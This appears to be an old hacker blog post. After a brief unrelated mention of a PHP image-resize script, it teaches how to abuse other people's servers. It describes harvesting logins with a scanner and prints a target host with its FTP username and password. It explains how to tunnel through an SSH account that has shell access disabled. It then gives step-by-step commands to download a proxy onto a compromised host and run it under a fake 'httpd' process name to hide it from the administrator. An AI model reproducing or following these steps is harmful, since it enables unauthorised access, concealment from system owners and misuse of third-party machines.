Result of this is script is 2 image :
1. Image with original size
2. Image after resize (I make width=200 and height=150).
Don’t forget to place the image in same location with this script. And give the image name with “picture.jpg”

Download the script here.
Make sure you change the extension of the file become .php

Maybe it’s only answer many question about “how to tunneling using ssh when the ssh shell cannot started”. There will not any problem if ssh shell is activated, you can direct them to tunneling using this way.
In this case, you have IP target that support port 22. It’s mean you can using them to tunneling (of course you must know the user and password :D) even though ssh shell is cannot started.
You can scan the target using phpconfigspy to grab and get the login password.


Let’s we started the lesson.
I find the target and scan them, lucky for me because i got user and password.
alvoacusxxx.pt
[FTP] elaboran:sggvhbui7 Success
If you login to that target using the user password, you will be prompt like this
login as: elaboran
elaboran@alvoacusxxx.pt’s password:
Last login: Fri May 15 02:43:04 2009 from 41.233.169.205
Shell access is not enabled on your account!
If you need shell access please contact support.
Don’t worry, you can still using that target to tunneling. The way will be similar with ssh tunnel, you just adding some configuration on putty.
Look at left side putty on Category tab, breakdown all the menu and you will find SSH tab. Choose SSH and give checkbox on the right side “Don’t start a shell or command at all” and “Enable Compression”.
It’s finish, you can login using that user password. You need to know if the login is correct, there will no effect after you login on screen. Putty screen will stop under password, but tunneling is work now.

You have ssh shell or target shell inject ? and you don’t know for what that shell ??
I will try to assist you how to make proxy using that ssh. First, get the source of proxy.tgz
If you using shell inject, you must find directory that have permission 777 (drwxrrwxrwx) with this command “find / - tipe d -perm 777″.
Look the step by step to build proxy bellow :

[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
–01:30:35– http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com… 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz’

100%[=======================================>] 54,004 –.-K/s in 0.04s

01:30:35 (1.21 MB/s) - `proxy.tgz’ saved [54004/54004]

[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox

[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr–r– 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132

Proxy already done and ready to use. Use the IP of ssh shell and 2020 for port.
That proxy is running using fakename ./httpd to blind the real administrator.
If you want to kill that proxy you can kill by PidNum (20132) using this command “kill -9 20132″.